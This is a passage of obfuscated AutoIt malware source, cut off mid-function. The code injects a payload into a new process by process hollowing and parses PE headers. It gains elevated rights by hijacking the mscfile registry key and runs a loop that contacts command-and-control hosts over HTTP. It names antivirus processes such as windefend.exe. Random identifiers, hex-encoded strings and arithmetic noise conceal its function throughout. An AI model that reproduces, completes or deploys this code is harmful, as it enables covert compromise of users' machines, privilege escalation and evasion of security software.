- Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 4096, "dword", ((((-1 / (0 - (-1 / -1))) + ((((64 + 0) / 4) / (-1 - (-3 / -1))) - (-1 * -2))) * ((8 / -2) + 8)) + Dec("54", 0)))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $mpodnfy6il, "ptr", $mwyrp6radfbjj2o18qu7lf5szz25ruvmuvpku, "dword_ptr", $uz6xcfbbq64sbwfiawi7sfvszlxpizffz2xtqul, "dword", 12288, "dword", (((27 - 74) - Dec("A")) + ((-2541 * 3) / -63)))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError(1, 0, 0)
- EndIf
- Return $gwzzqtmpqf7zmwclp1y5ow17jx7g[0]
- EndFunc
- Func dk_vmwfymcqhofyugmhpddqxooqcvdwehwcvkmqiu()
- Local $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b
- $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b = "byte["
- Return $2pjfmncdfz2mnl3plot26cbsfwvbfcflhuxkmogydq8k9vcn1b
- EndFunc
- Func rjobxxqrxdzlojrxrihhc_pwshhkcmgell_ilhndg()
- Return '"'
- EndFunc
- Func qncfzvydwgstqxunvotpueu_rxayyoqh_tdytykgytbidaxl()
- Local $ug7oa8thu5xd9ma77bad2eizh3meyp3
- $ug7oa8thu5xd9ma77bad2eizh3meyp3 = BinaryToString("0x5C", 1)
- Return $ug7oa8thu5xd9ma77bad2eizh3meyp3
- EndFunc
- Func kpknyihasguuzcnpgh_ygtofoavhpciukxvxur()
- Return Int(@OSArch <> BinaryToString(igbeploplr_lotsclxxroi_hkaewbqnllq(), Int(ChrW(49))))
- EndFunc
- Func myiozsgdsx_gyqebrqytsvfmdybrwfvptytxtaofhqw()
- Return "0x4d5a"
- EndFunc
- Func jydoxbdsboalqta()
- Local $wbofp4cm5wa = ksrhwexgnbnbqvyobldkyo()
- Return $wbofp4cm5wa
- EndFunc
- Func kadeezfkdnhosrk()
- Return pcwvdlesitqrcmdjor()
- EndFunc
- Func necwdvikdmlps()
- Local $ppmwfxw9ztr
- $ppmwfxw9ztr = "/C " & "/G" & " "
- Return $ppmwfxw9ztr
- EndFunc
- Func mnsufddmgkzoilpokytyaenadbrdvdzw()
- Local $cbkz2vkdak, $my56blirmrk9mvl8h11y6nl, $7rreuxn1kzllf8ickhwzibom9xvbzf, $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = Int(ChrW(49)), $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0, $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g = $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac, $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o = 0, $fz3eclo13c4hpsztvduuwn10gcs
- While (0 - -1)
- If $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g >= $tpc6yucicwgqkh24xw3ovlr34y5ylijinmmbbx50npj0ac Then
- $cbkz2vkdak = _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($srqtxvmgtidcu2rvvjoas5esdrgjfmwel, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][Int(Chr(51))], $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9)
- $my56blirmrk9mvl8h11y6nl = azcwrttikodsdhmtosilqrhymexeujembbbutt("h" & "tt" & "p:/" & "/" & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][0] & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][((-1 / Dec("1")) + StringLen("JX"))], $cbkz2vkdak, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][Dec("2")])
- If NOT @error Then
- $7rreuxn1kzllf8ickhwzibom9xvbzf = ndxipyamhikphz($my56blirmrk9mvl8h11y6nl)
- If IsArray($7rreuxn1kzllf8ickhwzibom9xvbzf) Then
- If UBound($7rreuxn1kzllf8ickhwzibom9xvbzf, 2) > 0 Then
- $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = $7rreuxn1kzllf8ickhwzibom9xvbzf[StringLen("k")][0]
- If $7rreuxn1kzllf8ickhwzibom9xvbzf[0][0] > StringLen("?") Then
- For $fz3eclo13c4hpsztvduuwn10gcs = Int(Chr("50")) To $7rreuxn1kzllf8ickhwzibom9xvbzf[0][0]
- Local $0anfbfiacxx[((((0 - 1) + 0) + ((((-2 + -19) + 57) / -3) / (2 / (0 - 1)))) / Int(ChrW("49")))]
- $0anfbfiacxx[0] = ((Dec("1") - 0) * (2 + StringLen("X")))
- $0anfbfiacxx[Dec("1")] = ztqerabqikbldjzkht()
- $0anfbfiacxx[Int(ChrW("50"))] = Int(Chr("49"))
- $0anfbfiacxx[((((0 + 1) / 1) + -2) * (((-2 - 1) / -1) + -6))] = $7rreuxn1kzllf8ickhwzibom9xvbzf[$fz3eclo13c4hpsztvduuwn10gcs][0]
- ebgjknluafaxae($7rreuxn1kzllf8ickhwzibom9xvbzf, $fz3eclo13c4hpsztvduuwn10gcs)
- If @error Then
- $0anfbfiacxx[((64 / -8) / (((-1 - 0) - (-3 + 0)) / -1))] = @error
- Else
- $0anfbfiacxx[StringLen("bFZn")] = ((1 / (((-1 + 2) / -1) + 0)) + 2)
- EndIf
- $cbkz2vkdak = _bmqdbh_ufvrqlauvcklcelaoiklndngwhaegqkha($0anfbfiacxx, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][(StringLen("r") * Dec("3", 0))], Int(ChrW("51")))
- $my56blirmrk9mvl8h11y6nl = azcwrttikodsdhmtosilqrhymexeujembbbutt(qybfjbuecwngyrqo_odrnlnmwnvyppgqcfi_ie() & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][0] & $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][1], $cbkz2vkdak, $kekmomat82cugd6sezckboynmw09zribmkpkmf7n[$u9tamu2mnnki66xnfsc7mazzb6jj4][StringLen("Et")])
- Next
- EndIf
- Else
- $fhjkoq3if1hf5ckhafie61bymukv1emwqyuvvp9 = $7rreuxn1kzllf8ickhwzibom9xvbzf[((1 / -1) - ((2 - 4) - 0))]
- EndIf
- $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g = 0
- Else
- If $u9tamu2mnnki66xnfsc7mazzb6jj4 = UBound($kekmomat82cugd6sezckboynmw09zribmkpkmf7n) - Dec("1", 0) Then
- $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0
- Else
- $u9tamu2mnnki66xnfsc7mazzb6jj4 += Int(ChrW("49"))
- EndIf
- EndIf
- Else
- If $u9tamu2mnnki66xnfsc7mazzb6jj4 = UBound($kekmomat82cugd6sezckboynmw09zribmkpkmf7n) - 1 Then
- $u9tamu2mnnki66xnfsc7mazzb6jj4 = 0
- Else
- $u9tamu2mnnki66xnfsc7mazzb6jj4 += 1
- EndIf
- EndIf
- EndIf
- If $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o >= StringLen("Tio5p1cAjbXSuJ95doFRxkPMWl6ryb") Then
- stvqetqqbhmugrymqjlizak_yukxjp_jxbsdbc(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- bkmjbpjydgpjezru(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- mxhcfimpbgdflxo(@ScriptFullPath, $rsfy8xu2owgjzzpao1)
- $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o = 0
- EndIf
- $a95d1ewveldjk32crh5nwfcj5mbmptrywkvc4g += (StringLen("2") / StringLen("M"))
- $gpvrob2c0gdr8bsucqh28yyv7x8p1cfaxmugjh3zvjvr50o += Int(ChrW("49"))
- xgtmdyqpzrxaz(1000000)
- WEnd
- EndFunc
- Func nv_borpqgeaixjlprncpywbsgweqp()
- Local $xvxf8xsuw9ia = "avg" & "emc." & "exe"
- Return $xvxf8xsuw9ia
- EndFunc
- Func ksrhwexgnbnbqvyobldkyo()
- Local $oksliujjvp8
- $oksliujjvp8 = wrwejjcgkvla()
- Return $oksliujjvp8
- EndFunc
- Func wkekrhvgdccunqlrxbzmvtjsrjxspmqifgazpkzvomgt()
- Return BinaryToString("0X416464726573734F66456E747279506F696E74", 1)
- EndFunc
- Func ibsumghztn()
- Return "ers;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapRes"
- EndFunc
- Func gmofpv_lujjeuwieyzud()
- Local $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8
- $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8 = "windefend.exe"
- Return $k4vg5kugjxduuw4ith61ewgkujubz58tljuaeipeugw8
- EndFunc
- Func smxjfdavhanpom()
- If IsAdmin() Then
- RegDelete(fcylnepcxv_uzhufwnkljroccpcnsunjaluok())
- Else
- If RegRead("HKEY_CURRENT_USER\Software\Clas" & "ses\" & "mscfile\sh" & "ell\open\co" & "mmand", "") <> hktqydwfesogan() & @ScriptFullPath & BinaryToString("0" & "X" & "2" & "2") Then
- RegWrite(ttdzytvstyhmtpzmkefjkuskvs(), "", bgxyyfcmeuf(), kfoafpxexzbtbwt_zlxizha() & @ScriptFullPath & ejltrmxaafxmoufziiqvmjtahjkcqjdzj_yg_jsvmbtdzaipj())
- ShellExecuteWait(jqfjrgefxhqdfylsmemgfjelhqg(), @SW_HIDE)
- Exit
- Else
- RegDelete(BinaryToString(BinaryToString("0x3078343834423435353935463433353535323532343534453534354635353533343535323543353336463636373437373631373236353543343336433631373337333635373335433644373336333636363936433635"), Int(ChrW(49))))
- EndIf
- EndIf
- EndFunc
- Func hktqydwfesogan()
- Return '"'
- EndFunc
- Func vk_efwdqyrquoke()
- Local $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta
- $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta = "\"
- Return $wet5bkuipqtvf5kipudivrjqp8eryamjpzops2yitdhta
- EndFunc
- Func fgtrgwgpfjpicdjldojqm()
- Return "Eax"
- EndFunc
- Func bokfzmjaxngdfest($iypf47lbaddtzs712vsbqs4ihrz60fmjs3ksoxz1ltf8)
- Local $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk, $ybkrjy2iz754u8yldiid
- $ybkrjy2iz754u8yldiid = $iypf47lbaddtzs712vsbqs4ihrz60fmjs3ksoxz1ltf8 & hzey_ahlkhvhemrscd_fl()
- If FileExists($ybkrjy2iz754u8yldiid) Then
- $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk = DllCall("kernel32.dll", "bool", "DeleteFileW", "wstr", $ybkrjy2iz754u8yldiid)
- If @error Then Return SetError(((-1 - StringLen("6")) - (-4 + 0)), @error, 0)
- Return $r9zohvmemv5ml25a8w1owfatafc2jwfinmbt4wr40bnyfk[0]
- EndIf
- Return 0
- EndFunc
- Func qybfjbuecwngyrqo_odrnlnmwnvyppgqcfi_ie()
- Local $pz5uibrldk17qmtfelmwouez
- $pz5uibrldk17qmtfelmwouez = BinaryToString("0x687474703A2F2F", 1)
- Return $pz5uibrldk17qmtfelmwouez
- EndFunc
- Func edis_boeogplxillynpbcevhtntqnzpqwo()
- Return "Data"
- EndFunc
- Func omqonkueyflthfeloopqjzyytqbxa_ussbwartdhxglxxtzqp()
- Return "rk|zo|bf|dw|tf|it|sk|vt|fj|aw|ys|he|yj|rt"
- EndFunc
- Func pkwphzoqwgrbylibjpvsujhsugxdiulmruppgoaeimwfdnjidy()
- Return "REG_SZ"
- EndFunc
- Func qngvvwowsbiinfao_aanc_axaxtoqv_sfmnohc()
- Return '","'
- EndFunc
- Func fxtypszalak_wovzpqvk_cabbwockiwvnhphgyloeyit()
- Return RegRead(BinaryToString("0x484B45595F4C4F43414C5F4D414348494E455C48415244574152455C4445534352495054494F4E5C53797374656D5C43656E7472616C50726F636573736F725C30", 1), BinaryToString(aytbzrapgkyw()))
- EndFunc
- Func cweespicvbksldpwwugjuchdstxolpsea()
- Return ",["
- EndFunc
- Func ttdzytvstyhmtpzmkefjkuskvs()
- Return "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command"
- EndFunc
- Func wgcf_gtdxrlslmygxwlyembab($t5udnekwjnfx, $7bhptjvdhzag = "", $ignppfwlzgku6tjxj5dmcjoqmnig = @AutoItExe, $mo3sjnyun7obbbv = False)
- Local $mbfm1yn0auxo = @AutoItX64
- Local $epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt = Binary($t5udnekwjnfx)
- Local $i1zovafisbvi9eqjok7y36d6e = DllStructCreate(fxsnghepq_i() & BinaryLen($epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt) & "]")
- DllStructSetData($i1zovafisbvi9eqjok7y36d6e, (Int(Chr("49")) / (0 - (-1 / 1))), $epmpfdmkkkdukwm3djiz3ng5dygxz0ktlefpt)
- Local $ohug55t6wkqrzcywe8 = DllStructGetPtr($i1zovafisbvi9eqjok7y36d6e)
- Local $5cp642et6jmjqly4od4gqms4 = DllStructCreate(BinaryToString(hins_xsbpamdjm()))
- Local $lvex13kltf6ptj = DllStructCreate("ptr Proce" & "ss;pt" & "r Thr" & "ead;dw" & "ord ProcessId;dw" & "ord ThreadId")
- If $mo3sjnyun7obbbv = False Then
- Local $0kcupzxrotvibhw8htfx = StringLen("WiHx")
- Else
- Local $0kcupzxrotvibhw8htfx = 4 + 8
- EndIf
- Local $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $ignppfwlzgku6tjxj5dmcjoqmnig, "wstr", $7bhptjvdhzag, "ptr", 0, "ptr", 0, "int", 0, "dword", $0kcupzxrotvibhw8htfx, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($5cp642et6jmjqly4od4gqms4), "ptr", DllStructGetPtr($lvex13kltf6ptj))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then Return SetError((((1 / Dec("1", 0)) + 0) / -1), 0, 0)
- Local $mpodnfy6il = DllStructGetData($lvex13kltf6ptj, esmvok_rkimdmtlhorftuvvulz_dbkiprijvximo_qjpenkiso())
- Local $gk43ktboa7b = DllStructGetData($lvex13kltf6ptj, BinaryToString("0X546872656164"))
- If $mbfm1yn0auxo AND gskybmwosfhcjgxfghszalc($mpodnfy6il) Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((Dec("1") + (-1 * 3)), 0, 0)
- EndIf
- Local $jbkokjcudb2o5m8caztuwg2owxt1a5oc0, $bbldic83pit5sf
- If $mbfm1yn0auxo Then
- If @OSArch = mq_ttlrxgpmqogskxroyqvwm_bdzggb() Then
- $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = Int(Chr("50"))
- $bbldic83pit5sf = DllStructCreate(BinaryToString(BinaryToString("0x307836313663363936373665323033313336336232303735363936653734333633343230353033313438366636643635336232303735363936653734333633343230353033323438366636643635336232303735363936653734333633343230353033333438366636643635336232303735363936653734333633343230353033343438366636643635336232303735363936653734333633343230353033353438366636643635336232303735363936653734333633343230353033363438366636643635336236343737366637323634323034333666366537343635373837343436366336313637373333623230363437373666373236343230346437383433373337323362373736663732363432303533363536373433353333623230373736663732363432303533363536373434373333623230373736663732363432303533363536373435373333623230373736663732363432303533363536373436373333623230373736663732363432303533363536373437373333623230373736663732363432303533363536373533373333623230363437373666373236343230343534363663363136373733336237353639366537343336333432303434373233303362323037353639366537343336333432303434373233313362323037353639366537343336333432303434373233323362323037353639366537343336333432303434373233333362323037353639366537343336333432303434373233363362323037353639366537343336333432303434373233373362373536393665373433363334323035323" & "6313738336232303735363936653734333633343230353236333738336232303735363936653734333633343230353236343738336232303735363936653734333633343230353236323738336232303735363936653734333633343230353237333730336232303735363936653734333633343230353236323730336232303735363936653734333633343230353237333639336232303735363936653734333633343230353236343639336232303735363936653734333633343230353233383362323037353639366537343336333432303532333933623230373536393665373433363334323035323331333033623230373536393665373433363334323035323331333133623230373536393665373433363334323035323331333233623230373536393665373433363334323035323331333333623230373536393665373433363334323035323331333433623230373536393665373433363334323035323331333533623735363936653734333633343230353236393730336237353639366537343336333432303438363536313634363537323562333435643362323037353639366537343336333432303463363536373631363337393562333133363564336232303735363936653734333633343230353836643664333035623332356433623" & "2303735363936653734333633343230353836643664333135623332356433623230373536393665373433363334323035383664366433323562333235643362323037353639366537343336333432303538366436643333356233323564336232303735363936653734333633343230353836643664333435623332356433623230373536393665373433363334323035383664366433353562333235643362323037353639366537343336333432303538366436643336356233323564336232303735363936653734333633343230353836643664333735623332356433623230373536393665373433363334323035383664366433383562333235643362323037353639366537343336333432303538366436643339356233323564336232303735363936653734333633343230353836643664333133303562333235643362323037353639366537343336333432303538366436643331333135623332356433623230373536393665373433363334323035383664366433313332356233323564336232303735363936653734333633343230353836643664333133333562333235643362323037353639366537343336333432303538366436643331333435623" & "332356433623230373536393665373433363334323035383664366433313335356233323564336237353639366537343336333432303536363536333734366637323532363536373639373337343635373235623335333235643362323037353639366537343336333432303536363536333734366637323433366636653734373236663663336237353639366537343336333432303434363536323735363734333666366537343732366636633362323037353639366537343336333432303463363137333734343237323631366536333638353436663532363937303362323037353639366537343336333432303463363137333734343237323631366536333638343637323666366435323639373033623230373536393665373433363334323034633631373337343435373836333635373037343639366636653534366635323639373033623230373536393665373433363334323034633631373337343435373836333635373037343639366636653436373236663664353236393730"), (((1 - 0) + -2) + (1 * 2))))
- Else
- $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = Dec("3", 0)
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((3 * (17 * (2 / -1))), 0, 0)
- EndIf
- Else
- $jbkokjcudb2o5m8caztuwg2owxt1a5oc0 = ((Dec("1") / (-1 + 0)) + 2)
- $bbldic83pit5sf = DllStructCreate(BinaryToString(BinaryToString(cgyaodzdyfzpzytflyedsdstcmvgxetfciaszc(), ((Int(Chr("49")) / (((Int(ChrW("49")) - 2) - (((-2 / (0 + ((1 / -1) / 1))) + -4) - 0)) + (-1 - (0 - -1)))) - (-1 * 2))), ((1 - 0) + 0)))
- EndIf
- Local $8opxvjba9oa0n6pepmdk4fdq
- Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
- Case StringLen("t")
- $8opxvjba9oa0n6pepmdk4fdq = 65543
- Case Int(ChrW("50"))
- $8opxvjba9oa0n6pepmdk4fdq = 1048583
- Case StringLen("TQZ")
- $8opxvjba9oa0n6pepmdk4fdq = 524327
- EndSwitch
- DllStructSetData($bbldic83pit5sf, bhdbndvdmngzjiwrafcrnttuviznobqoluwjkgnigeils(), $8opxvjba9oa0n6pepmdk4fdq)
- $gwzzqtmpqf7zmwclp1y5ow17jx7g = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $gk43ktboa7b, "ptr", DllStructGetPtr($bbldic83pit5sf))
- If @error OR NOT $gwzzqtmpqf7zmwclp1y5ow17jx7g[0] Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((StringLen("8R") + (-25 / 5)), 0, 0)
- EndIf
- Local $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr
- Switch $jbkokjcudb2o5m8caztuwg2owxt1a5oc0
- Case Int(Chr(49))
- $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr = DllStructGetData($bbldic83pit5sf, "E" & "b" & "x")
- Case ((Dec("1", 0) - ((0 - 2) + 4)) - (StringLen("K") * (0 + ((1 * ((0 + -1) - (-1 / -1))) + -1))))
- $yzgdgl23pjntj01ciziqamkinpqstmpb6lvpplr = DllStructGetData($bbldic83pit5sf, "R" & "dx")
- EndSwitch
- Local $r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc = DllStructCreate(BinaryToString(BinaryToString("0x3078363336383631373232303464363136373639363335623332356433623737366637323634323034323739373436353733346636653463363137333734353036313637363533623737366637323634323035303631363736353733336237373666373236343230353236353663366636333631373436393666366537333362373736663732363432303533363937613635366636363438363536313634363537323362373736663732363432303464363936653639366437353664343537383734373236313362373736663732363432303464363137383639366437353664343537383734373236313362373736663732363432303533353333623737366637323634323035333530336237373666373236343230343336383635363336623733373536643362373736663732363432303439353033623737366637323634323034333533336237373666373236343230353236353663366636333631373436393666366533623737366637323634323034663736363537323663363137393362363336383631373232303532363537333635373237363635363435623338356433623737366637323634323034663435346434393634363536653734363936363639363537323362373736663732363432303466343534643439366536363666373236643631373436393666366533623633363836313732323035323635373336353732373636353634333235623332333035643362363437373666373236343230343136343634373236353733373334663636346536353737343537383635343836353631363436353732"), (-1 / -1)), $ohug55t6wkqrzcywe8)
- Local $dbq90hhmy9udn0gcdyuunqrcbf3ixuu2 = $ohug55t6wkqrzcywe8
- $ohug55t6wkqrzcywe8 += DllStructGetData($r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc, BinaryToString(kjavlascotfsjjcnqepcvvftdcdqrkxyofgnmgnwmtobtwifw(), 1))
- Local $vdfnldk3i2wdiat7hftzoimszw5l8altkqcyq7uqj82vtfr5h = DllStructGetData($r8vggbyuuyurnalrp4xix4vr79wh9lnphqfc, smtocknhnytfzkdktgmccdh())
- If NOT ($vdfnldk3i2wdiat7hftzoimszw5l8altkqcyq7uqj82vtfr5h == BinaryToString(myiozsgdsx_gyqebrqytsvfmdybrwfvptytxtaofhqw(), (((1 - 0) + (0 + -2)) + (0 + (-2 + 4))))) Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError(-4, 0, 0)
- EndIf
- Local $zlf3i9mepibrdkh3jdyuknqdihshcg2x3 = DllStructCreate(BinaryToString("0x64776F7264205" & "369676E61747572" & "65", Int(ChrW("49"))), $ohug55t6wkqrzcywe8)
- $ohug55t6wkqrzcywe8 += (((((StringLen("z") - 0) - Dec("2")) + (Int(Chr(52)) / 2)) * ((Dec("2", 0) + -5) - 0)) - -7)
- If DllStructGetData($zlf3i9mepibrdkh3jdyuknqdihshcg2x3, BinaryToString(sdzvmsjsjepebalxyzamymrnjpzltpexiivwmoji())) <> Dec("4550") Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((Dec("14", 0) / (-12 / Dec("3", 0))), 0, 0)
- EndIf
- Local $fxkopwnqjcgjapiiyfwijnqdut = DllStructCreate(BinaryToString("0X776f7264204d616368696e653b776f7264204" & "e756d6265724f6653656374696f6e733b647" & "76f72642054696d65446174655374616d703b64776f726420506f696e746572546f53796d626f6c5461626c653b6" & "4776f7264204e756d6265724f6653796d626f6c733b776f72642053697a654f664f7074696f6e616c4865616465723b776f7264204368617261637465726973746" & "96373"), $ohug55t6wkqrzcywe8)
- Local $fpim71aquxa3tneqfcvmw5 = DllStructGetData($fxkopwnqjcgjapiiyfwijnqdut, "Nu" & "mber" & "Of" & "Sectio" & "ns")
- $ohug55t6wkqrzcywe8 += (-140 / -7)
- Local $s4vy6gbnfowssp8ap0zowjkqvpwqwcf2ispms93tm = DllStructCreate(ytfojlx_kruklwmhosdufnetruxxriwje(), $ohug55t6wkqrzcywe8)
- Local $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = DllStructGetData($s4vy6gbnfowssp8ap0zowjkqvpwqwcf2ispms93tm, 1)
- Local $g8f8je6pbziltsqw5knrzmgj
- If $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = (((Dec("5FD", 0) + (-44 * ((-5149 / 19) - ((((-1 * (-2 - 4)) - (((10 / (-1 * 2)) + ((-4 / (Dec("4") / -2)) + 10)) * StringLen("ov"))) * (0 - -2)) - -52)))) * (0 + -3)) / (24167 / (8008 / (616 / (-1 * (-1 * (110 / -10))))))) Then
- If $mbfm1yn0auxo Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((Int(Chr("51")) + -9), 0, 0)
- EndIf
- $g8f8je6pbziltsqw5knrzmgj = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUni" & "nitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dwo" & "rd BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorIm" & "ageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword S" & "izeOfHead" & ibsumghztn() & "erve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $ohug55t6wkqrzcywe8)
- $ohug55t6wkqrzcywe8 += Dec("60")
- ElseIf $qoprlnm43nhjgqsgv7ljl2nxlt64uomupiww = (((Dec("34", 0) + -127) * ((0 - ((Int(Chr("49")) + -2) / Dec("1", 0))) + (-4 - -8))) - -898) Then
- If NOT $mbfm1yn0auxo Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError(((-1 + (4 - 15)) / Int(Chr("50"))), 0, 0)
- EndIf
- $g8f8je6pbziltsqw5knrzmgj = DllStructCreate(fqvyfwcsqpxyfdtcwtjwoztevhzv(), $ohug55t6wkqrzcywe8)
- $ohug55t6wkqrzcywe8 += (((3 - -4) + -23) * (-1 * (2 + 5)))
- Else
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError((((1 - (2 / Int(ChrW("49")))) + (0 + 2)) - StringLen("-17CGI0")), 0, 0)
- EndIf
- Local $zuinpjpxoem5ozdk2fmoujsnly2lma34v2voq5atmkqm = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, wkekrhvgdccunqlrxbzmvtjsrjxspmqifgazpkzvomgt())
- Local $kmqdusdqnhmsmalt7rg = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, BinaryToString(jepxrkcfuyrxzfsmmbnhng()))
- Local $dcda6qowuym57zfqucadzu = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, "I" & BinaryToString("0x6d" & "6" & "16" & "7", Dec("1", 0)) & "eBas" & "e")
- Local $rqr75skrbzzbitd4vhr = DllStructGetData($g8f8je6pbziltsqw5knrzmgj, wfynrtnxvldsaqsxxxjvingsuonfhpzclgygl())
- $ohug55t6wkqrzcywe8 += 8
- $ohug55t6wkqrzcywe8 += Int(ChrW(56))
- $ohug55t6wkqrzcywe8 += ((((-25 + 229) - 434) - Dec("6A")) / (-12 + (0 + (-1 + -1))))
- Local $beofbo3ndcgq7rjtgmlp = DllStructCreate("dw" & "ord" & BinaryToString("0X205669") & "r" & BinaryToString("0x747561") & "lA" & "ddres" & "s" & "; dword Siz" & "e", $ohug55t6wkqrzcywe8)
- Local $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech = DllStructGetData($beofbo3ndcgq7rjtgmlp, BinaryToString(BinaryToString("0X305835363639373237343735363136633431363436343732363537333733", Int(ChrW("49"))), 1))
- Local $wkkz3rasb01j = DllStructGetData($beofbo3ndcgq7rjtgmlp, joudnyrrydhvjpqr_qbpophdiyevazz_yvvdzrjtzr())
- Local $yjpgyvsyamgsnrwji
- If $zmqhxaze895g8ieuyxjymibxbevy1lyrqyech AND $wkkz3rasb01j Then $yjpgyvsyamgsnrwji = True
- $ohug55t6wkqrzcywe8 += ((((((-19 + (0 + -2)) * 2) / Int(Chr("54"))) * -5) - ((-1 + -31) - -111)) * (Dec("2") + (16 / -4)))
- Local $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72
- Local $9eg6qismk48f2dexizujquoy3t
- If $yjpgyvsyamgsnrwji Then
- $9eg6qismk48f2dexizujquoy3t = ztcpagvsrzpo($mpodnfy6il, $rqr75skrbzzbitd4vhr)
- If @error Then
- $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
- If @error Then
- ttoltiicmgfiojuqigpzcqvdskcnrs($mpodnfy6il, $dcda6qowuym57zfqucadzu)
- $9eg6qismk48f2dexizujquoy3t = oz_xgvhffmrfbaoqtcyzzbhpehbysxguyrniouhmu($mpodnfy6il, $dcda6qowuym57zfqucadzu, $rqr75skrbzzbitd4vhr)
- If @error Then
- DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $mpodnfy6il, "dword", 0)
- Return SetError(-101, (0 + (0 + 1)), 0)
- EndIf
- EndIf
- EndIf
- $ao8hqhjerekhtrm4ibqjzxiuq81qtkeu72 = True
- Else
